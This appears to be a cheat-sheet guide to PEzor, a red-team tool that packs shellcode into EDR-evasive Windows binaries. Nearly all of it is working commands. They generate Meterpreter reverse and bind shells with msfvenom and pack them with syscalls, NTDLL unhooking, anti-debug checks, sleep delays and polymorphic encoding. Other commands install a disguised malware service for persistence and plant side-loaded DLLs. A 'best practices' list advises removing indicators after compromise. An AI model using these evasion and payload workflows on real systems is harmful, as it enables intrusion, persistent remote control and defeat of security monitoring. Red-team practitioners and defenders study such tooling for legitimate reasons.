PEzor
PEzor is an advanced red team tool that transforms raw shellcode and PE executables into EDR-evasive binaries using syscalls, memory injection, and NTDLL unhooking. It’s widely used for evading endpoint detection and response (EDR) solutions during post-exploitation.
Installation
섹션 제목: “Installation”Clone the repository and run the installation script:
git clone https://github.com/phra/PEzor.git
cd PEzor
./install.shFor manual installation, ensure dependencies are available:
# Ubuntu/Debian dependencies
sudo apt-get install mingw-w64 clang
# macOS with Homebrew
brew install mingw-w64
# Install additional required tools
pip install pefileFor Docker-based deployment:
docker build -t pezor .
docker run -it -v $(pwd):/work pezor /bin/bashKey dependencies:
mingw-w64— Cross-compiler for Windows targetsclangorwclang— C/C++ compiler supportinline_syscall— Direct syscall implementationnasm— Assembler for assembly codedonut— .NET assembly to shellcode converter
Quick Start
섹션 제목: “Quick Start”Basic workflow to pack shellcode into an executable:
# Generate shellcode (raw binary format)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw > shellcode.bin
# Pack with PEzor (minimal options)
./PEzor.sh shellcode.bin
# Output is generated as exe.bin or specified formatDefault behavior generates an executable that injects shellcode into itself upon execution.
Input Types
섹션 제목: “Input Types”| Input Type | Format | Example | Use Case |
|---|---|---|---|
| Raw Shellcode | .bin binary | msfvenom output | Direct payload embedding |
| PE Executable | .exe / .dll | beacon.exe | Wrapping existing binaries |
| .NET Assembly | .exe / .dll | CSharp payload | Donut conversion + packing |
| Shellcode Stub | C array | unsigned char buf[] | Inline shellcode definitions |
Raw Shellcode Input
섹션 제목: “Raw Shellcode Input”# msfvenom output (raw format)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=8080 \
-f raw > payload.bin
# CobaltStrike raw format
# Export beacon as raw shellcode from Cobalt Strike
./PEzor.sh beacon.binPE Executable Input
섹션 제목: “PE Executable Input”# Pack existing executable
./PEzor.sh process.exe -format=exe
# Pack DLL for injection
./PEzor.sh legit.dll -format=reflective-dll.NET Assembly via Donut
섹션 제목: “.NET Assembly via Donut”# Convert .NET assembly to shellcode
donut -i program.exe -o donut_shellcode.bin
# Pack with PEzor
./PEzor.sh donut_shellcode.bin -format=exeOutput Formats
섹션 제목: “Output Formats”| Format | Extension | Description | Use Case |
|---|---|---|---|
| exe | .exe | Standalone Windows executable | Direct execution |
| dll | .dll | Dynamic Link Library | Process injection, DLL search order hijacking |
| reflective-dll | .dll | Position-independent DLL | In-memory reflective injection |
| service-exe | .exe | Windows Service executable | Persistence via service installation |
| service-dll | .dll | Service-compatible DLL | Service-based persistence |
Generate Executable
섹션 제목: “Generate Executable”./PEzor.sh shellcode.bin -format=exe
# Output: exe.bin (rename to .exe)
mv exe.bin payload.exeGenerate DLL
섹션 제목: “Generate DLL”./PEzor.sh shellcode.bin -format=dll
# Output: dll.bin (rename to .dll)
mv dll.bin payload.dllReflective DLL (Position-Independent)
섹션 제목: “Reflective DLL (Position-Independent)”./PEzor.sh shellcode.bin -format=reflective-dll
# Suitable for reflective DLL injection without relocationWindows Service Executable
섹션 제목: “Windows Service Executable”./PEzor.sh shellcode.bin -format=service-exe
# Executable compatible with service installation
sc create MalwareService binPath= "C:\path\to\service.exe"Execution Methods
섹션 제목: “Execution Methods”| Method | Flag | Description | Detection Risk |
|---|---|---|---|
| Self-Injection | -self | Thread creation within same process | Lower (no new process) |
| RX Memory | -rx | Read-execute memory allocation | Lower (not RWX) |
| Direct Syscalls | -syscalls | Bypass hooked NTDLL functions | Lowest |
| DLL Unhooking | -unhook | Remove NTDLL hooks before execution | Very Low |
Self-Injection
섹션 제목: “Self-Injection”# Inject shellcode into current process
./PEzor.sh shellcode.bin -selfRX Memory Execution
섹션 제목: “RX Memory Execution”# Allocate RX (read-execute) memory instead of RWX
./PEzor.sh shellcode.bin -rxDirect Syscalls
섹션 제목: “Direct Syscalls”# Bypass hooked Windows API functions
./PEzor.sh shellcode.bin -syscallsNTDLL Unhooking
섹션 제목: “NTDLL Unhooking”# Remove installed hooks before execution (for EDR evasion)
./PEzor.sh shellcode.bin -unhookCombined Approach
섹션 제목: “Combined Approach”# Maximum evasion: syscalls + unhooking + RX memory
./PEzor.sh shellcode.bin -syscalls -unhook -rx -format=exeSyscall Options
섹션 제목: “Syscall Options”Direct syscalls allow bypassing user-mode API hooks planted by EDR solutions.
# Enable syscall-based API calls
./PEzor.sh shellcode.bin -syscalls
# Syscalls with Shikata Ga Nai encoding
./PEzor.sh shellcode.bin -syscalls -sgn
# Mixed API and syscall approach
./PEzor.sh shellcode.bin -syscalls -antidebugNote: Syscalls must match target OS version (Windows 10, Windows 11, Server variants).
Anti-Debug and Evasion
섹션 제목: “Anti-Debug and Evasion”| Evasion Technique | Flag | Purpose |
|---|---|---|
| Anti-Debugging | -antidebug | Detect debugger attachment |
| Delayed Execution | -sleep=N | Sleep N seconds before execution |
| Text Section | -text | Execute from .text section instead of .reloc |
| Shikata Ga Nai | -sgn | Polymorphic XOR encoding |
| Obfuscation | -obfuscate | Add obfuscation layers |
Anti-Debug Detection
섹션 제목: “Anti-Debug Detection”# Add anti-debugging checks
./PEzor.sh shellcode.bin -antidebug -format=exeDelayed Execution
섹션 제목: “Delayed Execution”# Sleep 30 seconds before execution (evade quick sandboxes)
./PEzor.sh shellcode.bin -sleep=30 -format=exeText Section Execution
섹션 제목: “Text Section Execution”# Execute from .text section (less suspicious than .reloc)
./PEzor.sh shellcode.bin -text -format=exePolymorph Encoding
섹션 제목: “Polymorph Encoding”# Apply Shikata Ga Nai encoding (avoid signature detection)
./PEzor.sh shellcode.bin -sgn -format=exeCombined Evasion
섹션 제목: “Combined Evasion”# Full evasion suite
./PEzor.sh shellcode.bin -antidebug -sleep=15 -text -unhook -syscalls -format=exeUnhooking
섹션 제목: “Unhooking”NTDLL unhooking removes user-mode hooks installed by EDR products, restoring direct access to Windows APIs.
# Unhook NTDLL before execution
./PEzor.sh shellcode.bin -unhook
# Unhook + syscalls (most effective)
./PEzor.sh shellcode.bin -unhook -syscalls
# Unhook with format specification
./PEzor.sh shellcode.bin -unhook -format=reflective-dllHow it works:
- Reads clean NTDLL from disk
- Replaces hooked functions in memory
- Restores original function prologues
- Redirects all subsequent API calls to clean versions
Shellcode Generation
섹션 제목: “Shellcode Generation”MSFVenom Payloads
섹션 제목: “MSFVenom Payloads”# Reverse TCP shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw > meter.bin
# Reverse HTTPS
msfvenom -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f raw > meter_https.bin
# Bind shell
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f raw > bind.bin
# Staged vs unstaged
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw > staged.bin
msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw > unstaged.binCobalt Strike Raw Export
섹션 제목: “Cobalt Strike Raw Export”# In Cobalt Strike Beacon console:
# 1. Attacks > Packages > Shellcode Generator
# 2. Select "raw" output format
# 3. Copy to file and pack with PEzor
./PEzor.sh cobalt_beacon.bin -format=exeDonut for .NET Assemblies
섹션 제목: “Donut for .NET Assemblies”# Convert C# assembly to shellcode
donut -i CSharpPayload.exe -o csharp_shellcode.bin
# Pack converted shellcode
./PEzor.sh csharp_shellcode.bin -format=exe -unhook -syscallsDLL Side-Loading Workflow
섹션 제목: “DLL Side-Loading Workflow”DLL side-loading exploits search order hijacking by replacing legitimate DLLs with malicious versions.
# Generate DLL payload
./PEzor.sh shellcode.bin -format=dll
# Rename to match legitimate DLL name
cp dll.bin mscoree.dll
# Place alongside legitimate application expecting that DLL
# Application loads malicious DLL instead of system versionFinding Side-Load Candidates
섹션 제목: “Finding Side-Load Candidates”# Use Procmon to identify DLL loading attempts
# Look for "NAME NOT FOUND" errors indicating missing DLLs
# These are prime candidates for side-loading
# Common side-load targets:
# - mscoree.dll (CLR loader)
# - cryptbase.dll (crypto APIs)
# - dwmapi.dll (Desktop Window Manager)
# - wlanapi.dll (WiFi APIs)Complete Examples
섹션 제목: “Complete Examples”Meterpreter Reverse Shell
섹션 제목: “Meterpreter Reverse Shell”# Generate shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw > meterpreter.bin
# Pack with maximum evasion
./PEzor.sh meterpreter.bin -format=exe -antidebug -sleep=10 \
-unhook -syscalls -text
# Output: exe.bin
cp exe.bin payloadmeter.exeCobalt Strike Beacon
섹션 제목: “Cobalt Strike Beacon”# Export raw beacon from Cobalt Strike
# Place in: beacon.bin
# Pack with service format for persistence
./PEzor.sh beacon.bin -format=service-exe -unhook -syscalls -sgn
# Install as service
cp exe.bin C:\Windows\System32\svchost_malware.exe
sc create MalwareService binPath= "C:\Windows\System32\svchost_malware.exe"
sc start MalwareService.NET C2 Agent via Donut
섹션 제목: “.NET C2 Agent via Donut”# Compile C# agent
csc.exe /out:Agent.exe Agent.cs
# Convert to shellcode
donut -i Agent.exe -o agent_shellcode.bin
# Pack as reflective DLL
./PEzor.sh agent_shellcode.bin -format=reflective-dll -unhook -syscalls
# Use with reflective DLL injectionObfuscated DLL for DLL Search Order Hijacking
섹션 제목: “Obfuscated DLL for DLL Search Order Hijacking”# Generate DLL
./PEzor.sh shellcode.bin -format=dll -sgn -antidebug -sleep=5
# Rename to match target
cp dll.bin version.dll
# Stage in directory with legitimate application
# Application execution triggers DLL load and payload executionTroubleshooting
섹션 제목: “Troubleshooting”| Issue | Solution |
|---|---|
command not found: PEzor.sh | Ensure script is executable: chmod +x PEzor.sh |
mingw-w64: not found | Install cross-compiler: apt-get install mingw-w64 |
Invalid shellcode format | Verify input is raw binary (not hex/base64): file shellcode.bin |
EDR still detecting | Add more evasion: -unhook -syscalls -text -antidebug |
Shellcode corrupted on output | Use -rx with -format=exe for stability |
DLL fails to load | Verify correct format: -format=reflective-dll for injection scenarios |
Service-exe won't start | Ensure service has compatible entry point (not console application) |
Best Practices
섹션 제목: “Best Practices”- Test locally first: Always validate payloads in safe lab environment before deployment
- Layer evasion: Combine
-unhook,-syscalls,-antidebug, and-sleepfor defense-in-depth - Match OS version: Syscall numbers vary by Windows version; validate target OS before execution
- Use reflective DLL: For in-memory execution, prefer
-format=reflective-dllover standard DLL - Encode payloads: Apply
-sgn(Shikata Ga Nai) encoding to avoid signature detection - Randomize delays: Use variable
-sleepvalues across campaign to avoid pattern detection - Monitor modifications: EDR may detect file write behavior; stage payloads in-memory when possible
- Test beacon connectivity: Verify C2 communication before declaring success
- Cleanup indicators: Remove PEzor output files and staging locations post-compromise
- Update regularly: PEzor evolves with EDR detection methods; monitor for updates
Related Tools
섹션 제목: “Related Tools”| Tool | Purpose | Integration |
|---|---|---|
| Donut | .NET to shellcode converter | Input generation for PEzor |
| ScareCrow | Shellcode loader with evasion | Alternative EDR bypass approach |
| Freeze | Process suspension for evasion | Complementary evasion technique |
| NimCrypt2 | Nim-based payload encryption | Payload encoding alternative |
| shhhloader | Silent loader framework | DLL loading wrapper |
| Cobalt Strike | Command & Control platform | Primary shellcode source |
| Metasploit | Payload generation | Alternative payload source |